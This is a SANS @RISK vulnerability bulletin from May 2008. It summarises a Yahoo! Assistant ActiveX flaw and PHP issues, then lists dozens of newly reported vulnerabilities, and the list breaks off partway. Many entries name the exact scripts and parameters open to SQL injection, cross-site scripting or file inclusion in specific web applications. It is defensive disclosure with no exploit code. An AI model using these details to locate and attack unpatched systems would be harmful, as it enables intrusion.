Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: VII, Issue: 19
May 8, 2008

SANS Newsletters Home

A really light week. Enjoy it; next week will be much busier. Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Platform Number of Updates and Vulnerabilities
    • - ------------------------ -------------------------------------
    • Third Party Windows Apps
    • 5 (#1)
    • Mac Os
    • 3
    • Linux
    • 3
    • Solaris
    • 2
    • Cross Platform
    • 19 (#2, #3)
    • Web Application - Cross Site Scripting
    • 15
    • Web Application - SQL Injection
    • 14
    • Web Application
    • 26

************************** Sponsored By SANS ****************************

How can I improve my pen testing regimen? What are the best and latest techniques for detailed reconnaissance? How can I leverage free tools with commercial tools for maximum effect? Find out at the Penetration Testing and Ethical Hacking Summit June 2-3 - Las Vegas. http://www.sans.org/info/28659

*************************************************************************

TRAINING UPDATE Where can you find the newest Penetration Testing techniques, Application Pen Testing, Hacker Exploits, Secure Web Application Development, Security Essentials, Forensics, Wireless, Auditing, both new Pen Testing courses, CISSP, and SANS' other top-rated courses plus evening sessions with Internet Storm Center handlers. - - SANSFIRE 2008 in Washington DC (7/22-7/31) SANS' biggest summer program with many bonus sessions and a big exhibition of security products: http://www.sans.org/info/26774 - - London (6/2-6/7) and Amsterdam (6/16-6/21) and Brussels (6/16-6/21) http://www.sans.org/secureeurope08 - - Denver (6/7-6/13) http://www.sans.org/rockymnt2008/ - - Singapore (6/30-7/5) http://www.sans.org/singapore08/ - - Boston (8/9-8/16) http://www.sans.org/boston08/ - - and in 100 other cites and on line any time: www.sans.org

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Third Party Windows Apps
Mac Os
Linux
Solaris
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application

************************** SPONSORED LINK *******************************

1) Get on top of security and compliance concerns with log management and integrated change monitoring http://www.sans.org/info/28664

*************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) HIGH: Yahoo! Assistant ActiveX Control Memory Corruption
  • Affected:
    • Yahoo! Assistant 'yNotifier.dll' ActiveX Control

  • Description: Yahoo! Assistant is a Browser Helper Object (BHO) for Microsoft Internet Explorer. It provides users of Internet Explorer with a variety of useful features. Part of its functionality is provided by the "yNotifier.dll" library. This library contains multiple exported objects, including some that were not designed to be instantiated within Internet Explorer. A malicious web page that instantiates these objects within Internet Explorer could trigger a memory corruption condition. Successfully exploiting these vulnerabilities could potentially allow an attacker to execute arbitrary code with the privileges of the current user. Full technical details and a simple proof-of-concept are publicly available for these vulnerabilities.

  • Status: Yahoo! confirmed, updates available. Users can mitigate the impact of these vulnerabilities by disabling the affected control via Microsoft's "kill bit" mechanism using CLSID "2283BB66-A15D-4AC8-BA72-9C8C9F5A1691".

  • References:
  • (3) MODERATE: PHP Multiple Vulnerabilities
  • Affected:
    • PHP versions prior to 5.2.6

  • Description: PHP is an extremely popular language for web development, included by default in a large variety of Unix, Unix-like, and Linux operating system distributions. It contains multiple vulnerabilities in its handling of a variety of PHP code constructs and remote input processing. A specially crafted PHP script could trigger one of these vulnerabilities, allowing an attacker to execute arbitrary code with the privileges of the vulnerable process. An additional flaw in the handling of multibyte characters may lead to command injection from external sources, though this is not confirmed. Full technical details for these vulnerabilities are publicly available via source code analysis. Note that users of hosting providers often have permission to upload PHP scripts to shared servers.

  • Status: PHP confirmed, updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 19, 2008

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5549 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 08.19.1 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Castle Rock Computing SNMPc Community String Stack-Based Buffer Overflow
  • Description: Castle Rock Computing SNMPc is an application for monitoring networks. It is available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input to the community string sent in SNMP TRAP packets. SNMPc version 7.1.1 is affected. Ref: http://www.ngssoftware.com/advisories/critical-vulnerability-in-snmpc/
  • 08.19.2 - CVE: CVE-2007-6339
  • Platform: Third Party Windows Apps
  • Title: Akamai Download Manager ActiveX Control Remote Code Execution
  • Description: The Akamai Download Manager ActiveX control is a web-based file download manager. The application is exposed to a remote code execution issue. Akamai Download Manager versions prior to 2.2.3.5 are affected.
  • Ref: http://www.securityfocus.com/archive/1/491516
  • 08.19.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Nortel Multimedia PC Client Remote Packet Flood Denial of Service
  • Description: Nortel Multimedia PC Client is a network-based communications application for Microsoft Windows operating systems. The application is exposed to a remote denial of service issue due to its inability to properly handle unexpected network traffic.
  • Ref: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=719698
  • 08.19.4 - CVE: CVE-2008-2005
  • Platform: Third Party Windows Apps
  • Title: WonderWare SuiteLink "slssvc.exe" Remote Denial of Service
  • Description: SuiteLink is a network protocol similar to TCP/IP. The application is exposed to a remote denial of service issue that occurs in the Wonderware SuiteLink Service ("slsvc.exe") when allocating memory. Wonderware SuiteLink versions prior to 2.0 Patch 01 are affected.
  • Ref: http://www.securityfocus.com/archive/1/491623
  • 08.19.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Yahoo! Assistant "yNotifier.dll" ActiveX Control Memory Corruption
  • Description: Yahoo! Assistant is a Browser Helper Object for Internet Explorer. Yahoo! Assistant "yNotifier.dll" ActiveX control is exposed to a memory corruption issue. Yahoo! Assistant versions 3.6 and earlier are affected.
  • Ref: http://secway.org/advisory/AD20080506EN.txt
  • 08.19.6 - CVE: CVE-2005-2757
  • Platform: Mac Os
  • Title: Apple Mac OS X CoreFoundation Remote Buffer Overflow
  • Description: CoreFoundation is a framework that provides C APIs for applications. The application is exposed to a buffer overflow issue because it fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers.
  • Ref: http://www.securityfocus.com/bid/16882
  • 08.19.7 - CVE: CVE-2005-3700
  • Platform: Mac Os
  • Title: Apple Mac OS X Iodbcadmintool Local Privilege Escalation
  • Description: iodbcadmintool is a helper tool for the ODBC Administrator utility. The application is exposed to a local privilege escalation issue. It can allow attackers to gain elevated privileges on an affected computer.
  • Ref: http://www.securityfocus.com/bid/16903
  • 08.19.8 - CVE: CVE-2005-3701
  • Platform: Mac Os
  • Title: Apple Mac OS X Passwordserver Local Privilege Escalation
  • Description: passwordserver is exposed to a local privilege escalation issue. This issue can allow local attackers on Open Directory master servers to gain elevated privileges.
  • Ref: http://www.securityfocus.com/bid/16904
  • 08.19.9 - CVE: CVE-2008-1375
  • Platform: Linux
  • Title: Linux Kernel "dnotify.c" Local Race Condition
  • Description: The Linux kernel is exposed to a local race condition issue. It occurs in the "fcntl_dirnotify()" function of the "dnotify.c" source file. A local attacker may exploit this issue to crash the computer or to gain elevated privileges on the affected computer.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.6
  • 08.19.10 - CVE: CVE-2008-1294
  • Platform: Linux
  • Title: Linux Kernel RLIMIT_CPU Zero Limit Handling Local Security Bypass
  • Description: The Linux kernel is exposed to a local security bypass issue because it fails to properly handle certain RLIMIT_CPU time limitations. This issue resides in the "sys.c" source file and occurs when the CPU resource limit is set to zero. Linux kernel versions prior to 2.6.22 are affected.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=419706
  • 08.19.11 - CVE: CVE-2008-1675
  • Platform: Linux
  • Title: Linux Kernel Tehuti Network Driver "BDX_OP_WRITE" Memory Corruption
  • Description: The Linux kernel is exposed to a memory corruption issue due to insufficient boundary checks in the Tehuti network driver. This issue affects the "drivers/net/tehuti.c" source file, and can be exploited with specially-crafted "BDX_OP_WRITE" IOCTL calls. Linux kernel versions prior to 2.6.25.1 are affected.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.25.1
  • 08.19.12 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris 10 Unspecified SCTP Protocol Processing Remote Denial of Service
  • Description: Sun Solaris 10 is exposed to an unspecified denial of service issue because of SCTP (Stream Control Transmission Protocol) protocol processing. The Solaris 10 operating system is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-236321-1
  • 08.19.13 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris SCTP Network Flooding Remote Denial of Service
  • Description: Sun Solaris is exposed to a denial of service issue that occurs in SCTP (Stream Control Transmission Protocol) processing. The Solaris 10 operating system is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-236521-1
  • 08.19.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM WebSphere Application Server Java Plugin Security Bypass
  • Description: IBM WebSphere Application Server Java plugin is exposed to an unspecified security bypass issue which may allow a malicious applet to gain elevated privileges. WebSphere Application Server version 5.0.2 is affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg1PK65161
  • 08.19.15 - CVE: CVE-2005-2340
  • Platform: Cross Platform
  • Title: Apple QuickTime QTIF Image Processing Remote Heap Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote heap-based issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/archive/1/421561
  • 08.19.16 - CVE: CVE-2005-3713
  • Platform: Cross Platform
  • Title: Apple QuickTime GIF Image Processing Remote Heap Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote heap-based overflow issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/archive/1/421566
  • 08.19.17 - CVE: CVE-2005-3710
  • Platform: Cross Platform
  • Title: Apple QuickTime TIFF Image Processing Remote Integer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote integer overflow issue because it fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16867/info
  • 08.19.18 - CVE: CVE-2005-3711
  • Platform: Cross Platform
  • Title: Apple QuickTime TIFF Image Processing Strips/Bands Integer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote integer overflow issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/archive/1/421831
  • 08.19.19 - CVE: CVE-2005-3707
  • Platform: Cross Platform
  • Title: Apple QuickTime TGA Image Processing Remote Buffer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote buffer overflow issue because the application fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16872
  • 08.19.20 - CVE: CVE-2005-3708
  • Platform: Cross Platform
  • Title: Apple QuickTime TGA Image Processing Remote Integer Overflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote integer overflow issue because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16873
  • 08.19.21 - CVE: CVE-2005-3709
  • Platform: Cross Platform
  • Title: Apple QuickTime TGA Image Processing Remote Integer Underflow
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime as well as other media files. The application is exposed to a remote integer underflow issue because the application fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers. QuickTime versions prior to 7.0.4 are affected.
  • Ref: http://www.securityfocus.com/bid/16875
  • 08.19.22 - CVE: CVE-2007-6372
  • Platform: Cross Platform
  • Title: Multiple Vendors Malformed BGP "UPDATE" Message Remote Denial of Service
  • Description: Multiple vendors' BGP implementations are exposed to a remote denial of service issue that arises when the software handles specially crafted BGP packets. A remote attacker can exploit this issue to cause a denial of service between synchronized BGP peers.
  • Ref: http://www.kb.cert.org/vuls/id/929656
  • 08.19.23 - CVE: CVE-2008-0599
  • Platform: Cross Platform
  • Title: PHP 5.2.5 and Prior Versions Multiple Vulnerabilities
  • Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to multiple security issues. PHP versions 5.2.5 and earlier are affected.
  • Ref: http://www.php.net/ChangeLog-5.php#5.2.6
  • 08.19.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GraphicsMagick Unspecified Security Bypass
  • Description: GraphicsMagick is an image-processing application available for multiple platforms. It was originally derived from ImageMagick version 5.5.2. The application is exposed to a security bypass issue because it fails to properly process file extensions. GraphicsMagick versions prior to 1.1.12 are affected.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=595544
  • 08.19.25 - CVE: CVE-2005-3702
  • Platform: Cross Platform
  • Title: Apple Safari Remote Directory Traversal
  • Description: Safari is exposed to a remote directory traversal issue because the application fails to sanitize user-supplied input. It allows attackers to place files outside the specified download directory
  • Ref: http://www.securityfocus.com/bid/16926
  • 08.19.26 - CVE: CVE-2005-3705
  • Platform: Cross Platform
  • Title: Apple Safari WebKit Unspecified Heap Overflow
  • Description: Apple Safari is a browser available for Mac OS X and Microsoft Windows. Safari is exposed to a buffer overflow issue because it fails to properly bounds check user-supplied input before using it in an insufficiently sized buffer.
  • Ref: http://www.securityfocus.com/bid/29011
  • 08.19.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Animal Shelter Manager Improper Access Restriction Security Bypass
  • Description: Animal Shelter Manager is a computer solution for animal sanctuaries and shelters. The application is exposed to a security bypass issue. It occurs because the application fails to restrict unprivileged users from accessing certain unspecified privileged functionalities. Animal Shelter Manager version 2.2.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29022
  • 08.19.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Call of Duty Malformed "stats" command Denial of Service
  • Description: Call of Duty is a military first-person-shooter game distributed by Activision. The application is exposed to a denial of service issue because the application fails to handle exceptional conditions. Call of Duty 4 version 1.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491564
  • 08.19.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WebMod Multiple Remote Security Vulnerabilities
  • Description: WebMod is a multithreaded HTTP Server embedded into a MetaMod plugin available for Windows and Linux operating systems. WebMod is exposed to multiple issues. WebMod version 0.48 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491585
  • 08.19.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM Rational Build Forge Remote Denial of Service
  • Description: IBM Rational Build Forge is a software to automate, and accelerate build, and release processes. The application is exposed to a denial of service issue. Specifically, the software generates multiple "bfagent" server processes consuming CPU resources of the host. IBM Rational Build Forge version 7.0.2 is affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg21303877
  • 08.19.31 - CVE: CVE-2008-2080
  • Platform: Cross Platform
  • Title: CDF (Common Data Format) Library "src/lib/cdfread64.c" Stack-Based Buffer Overflow
  • Description: The CDF (Common Data Format) library is a data abstraction for the storage, manipulation, and access of multidimensional data sets. CDF was developed by the NASA Goddard Space Flight Center. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data when processing CDF files. CDF versions 3.2 and earlier are affected.
  • Ref: http://www.coresecurity.com/?action=item&id=2260
  • 08.19.32 - CVE: CVE-2008-2085
  • Platform: Cross Platform
  • Title: SIPp Multiple Remote Buffer Overflow Vulnerabilities
  • Description: SIPp is an open-source test tool for the SIP protocol. The application is exposed to multiple buffer overflow issues because it fails to perform adequate boundary checks on user-supplied input. SIPp version 3.1 is affected.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=479039
  • 08.19.33 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: C-News "install.php" Cross-Site Scripting
  • Description: C-News is a news script. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "etape" parameter of the "install.php" script.
  • Ref: http://www.securityfocus.com/bid/28989
  • 08.19.34 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: AstroCam "pic.php" Cross-Site Scripting
  • Description: AstroCam is a UNIX daemon that is used to control remote cameras. The server can be controlled with a web interface. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "pic.php" script. AstroCam versions 2.5.0 to 2.7.3 are affected.
  • Ref: http://www.securityfocus.com/archive/1/491513
  • 08.19.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: MJGUEST "mjguest.php" Cross-Site Scripting
  • Description: MJGUEST is a guestbook application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "level" parameter of the "mjguest.php" script. MJGUEST version 6.7 GT is affected.
  • Ref: http://www.securityfocus.com/archive/1/491523
  • 08.19.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: CoronaMatrix phpAddressBook "username" Cross-Site Scripting
  • Description: phpAddressBook is a web-based address book. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "username" parameter of the "index.php" script. phpAddressBook version 2.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491525
  • 08.19.37 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: QT-cute Quicktalk Guestbook Multiple Cross-Site Scripting Vulnerabilities
  • Description: QT-cute Quicktalk Guestbook is a guestbook application. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input. QT-cute Quicktalk Guestbook version 1.6 is affected.
  • Ref: http://www.securityfocus.com/bid/29013
  • 08.19.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: BlackBook Multiple Cross-Site Scripting Vulnerabilities
  • Description: BlackBook is a guestbook application. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input to the "lang" parameter. BlackBook version 1.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491549
  • 08.19.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: LifeType "admin.php" Cross-Site Scripting
  • Description: LifeType is a web blog application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "searchTerms" parameter of the "admin.php" script when the "op" parameter is set to "editArticleCategories". LifeType version 1.2.7 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491550
  • 08.19.40 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Zomplog "category.php" Cross-Site Scripting
  • Description: Zomplog is a web-log application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "catname" parameter of the "category.php" script when the "addcat" parameter is set to "Submit". Zomplog version 3.8.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491553
  • 08.19.41 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: ChiCoMaS "index.php" Cross-Site Scripting
  • Description: ChiCoMaS is a content management application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "q" parameter of the "index.php" script. ChiCoMaS version 2.0.4 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491562
  • 08.19.42 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Ilient SysAid "searchField" Parameter Cross-Site Scripting
  • Description: SysAid is a web-based Help Desk Software. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "searchField" parameter of the "SystemList.jsp" script. SysAid version 5.1.08 is affected.
  • Ref: http://www.securityfocus.com/bid/29037
  • 08.19.43 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Typo3 Powermail Extension Unspecified Cross-Site Scripting
  • Description: Powermail is an Extension for Typo3. The application is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. Powermail Extension version 1.1.9 is affected. Ref: http://typo3.org/teams/security/security-bulletins/typo3-20080505-2/
  • 08.19.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GEDCOM_to_MySQL2 Multiple Cross-Site Scripting Vulnerabilities
  • Description: GEDCOM_to_MySQL2 is a PHP-based application to convert files to a GEDCOM MySQL database. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/29048
  • 08.19.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: LifeType 1.2.8 "admin.php" Cross-Site Scripting
  • Description: LifeType is a weblog application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "newBlogUserName" HTTP POST parameter of the "admin.php" script when the "op" parameter is set to "editArticleCategories". LifeType version 1.2.8 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491600
  • 08.19.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Maian Uploader Multiple Cross-Site Scripting Vulnerabilities
  • Description: Maian Uploader is a file uploader application. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. Maian Uploader version 4.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491599
  • 08.19.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: osCommerce Multiple Cross-Site Scripting Vulnerabilities
  • Description: osCommerce is a web-based shopping cart application. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied data to the following scripts and parameters: "categories.php: pID, page" and "orders.php: cID". osCommerce versions 2.2 RC1 and 2.2 RC2a are affected.
  • Ref: http://www.securityfocus.com/bid/29055
  • 08.19.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! and Mambo Webhosting Component "catid" Parameter SQL Injection
  • Description: Webhosting Component is an application for the Joomla! and Mambo content managers. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "catid" parameter of the "com_webhosting" component before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/29000
  • 08.19.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: BlogMe PHP "comments.php" SQL Injection
  • Description: BlogMe PHP is a web-log application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "comments.php" script before using it in an SQL query. BlogMe PHP version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29030
  • 08.19.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: SmartBlog "index.php" SQL Injection
  • Description: SmartBlog is a PHP-based weblog application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "idt" parameter of the "index.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/29033
  • 08.19.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Scout Portal Toolkit "ParentId" Parameter SQL Injection
  • Description: Scout Portal Toolkit is a collection of web tools. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "ParentId" parameter of the "SPT--BrowseResources.php" script before using it in an SQL query. Scout Portal Toolkit version 1.4.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491611
  • 08.19.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: pnEncyclopedia PostNuke module "id" Parameter SQL Injection
  • Description: pnEncyclopedia is an encyclopedia creation module for the PostNuke content manager. The module is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "pnEncyclopedia" module before using it in an SQL query. pnEncyclopedia version 0.2.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491606
  • 08.19.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Online-rent.com Property Rental Script "pid" Parameter SQL Injection
  • Description: Online-rent.com Property Rental Script is a PHP-based booking application for rental properties. Online-rent.com Property Rental Script is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "pid" parameter of the "index.php" script before using it in an SQL query. Property Rental Script version 4.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491607
  • 08.19.54 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: AnServ Auction XL "viewfaqs.php" SQL Injection
  • Description: AnServ Auction XL is a PHP-based auction application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter of the "viewfaqs.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/archive/1/491608
  • 08.19.55 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: BackLinkSpider "cat_id' Multiple SQL Injection Vulnerabilities
  • Description: BackLinkSpider is a PHP-based weblog application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "cat_id" parameter of various unspecified scripts.
  • Ref: http://www.securityfocus.com/bid/29054
  • 08.19.56 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: BatmanPorTaL "id" Multiple SQL Injection Vulnerabilities
  • Description: BatmanPorTaL is a ASP-based web portal application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the following scripts: "uyeadmin.asp" and "profil.asp".
  • Ref: http://www.securityfocus.com/bid/29057
  • 08.19.57 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: phpDirectorySource Multiple SQL Injection Vulnerabilities
  • Description: phpDirectorySource is a web-based application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the following scripts and parameters: "show.php: lid" and "admin.php: login". phpDirectorySource version 1.1.06 is affected.
  • Ref: http://www.securityfocus.com/bid/29039
  • 08.19.58 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: iGaming CMS "poll_vote.php" SQL Injection
  • Description: iGaming CMS is a PHP-based content manager for gaming web sites. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "poll_vote.php" script before using it in an SQL query. iGaming CMS version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/29059
  • 08.19.59 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Intesync LLC Miniweb 2.0 Blog Writer Module "historymonth" Parameter SQL Injection
  • Description: Intesync LLC Blog Writer is a PHP-based blogging module for Miniweb 2.0 content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "historymonth" parameter of the "blogwriter" module before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/29061
  • 08.19.60 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Pre Shopping Mall "search.php" SQL Injection
  • Description: Pre Shopping Mall is a web-based application. It is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "search" parameter of the "search.php" script. Pre Shopping Mall version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29067
  • 08.19.61 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PHPEasyData "annuaire.php" SQL Injection
  • Description: PHPEasyData is a PHP-based application that allows users to display dynamic data and directories. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat_id" parameter of the "annuaire.php" script before using it in an SQL query. PHPEasyData version 1.5.4 is affected.
  • Ref: http://www.securityfocus.com/bid/29068
  • 08.19.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Interchange Unspecified Denial of Service
  • Description: Interchange is an ecommerce application implemented in Perl. The application is exposed to a denial of service issue that stems from an error when processing certain unspecified HTTP POST requests. Interchange version 5.2.1 is affected.
  • Ref: http://www.securityfocus.com/bid/28987
  • 08.19.63 - CVE: Not Available
  • Platform: Web Application
  • Title: WebGUI Data Form Unspecified Security
  • Description: WebGUI is a web application framework and content manager. The application is exposed to an unspecified issue on the Data Form list view. WebGUI version 7.4.34 is affected. Ref: http://sourceforge.net/project/shownotes.php?release_id=595907&group_id=51417
  • 08.19.64 - CVE: Not Available
  • Platform: Web Application
  • Title: PBCS Multiple Input Validation Vulnerabilities
  • Description: PBCS (Project Based Calendaring System) is a web-based calendar application implemented in PHP. The application is exposed to multiple input validation issues. Project Based Calendaring System version 0.7.1 is affected.
  • Ref: http://www.securityfocus.com/bid/28991
  • 08.19.65 - CVE: Not Available
  • Platform: Web Application
  • Title: OxYProject Edit Chat History Remote Code Execution
  • Description: OxYProject is PHP-based chat room application. The application is exposed to an issue that lets remote attackers execute arbitrary code because it fails to properly sanitize user-supplied input to the "Your Message Here" form field parameter of the "edithistory.php" script. OxYProject version 0.85 is affected.
  • Ref: http://www.securityfocus.com/bid/28992
  • 08.19.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Harris Wap Chat "sysFileDir" Parameter Multiple Remote File Include Vulnerabilities
  • Description: Harris Wap Chat is a PHP-based application. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/28995
  • 08.19.67 - CVE: Not Available
  • Platform: Web Application
  • Title: Interact Multiple Remote File Include Vulnerabilities
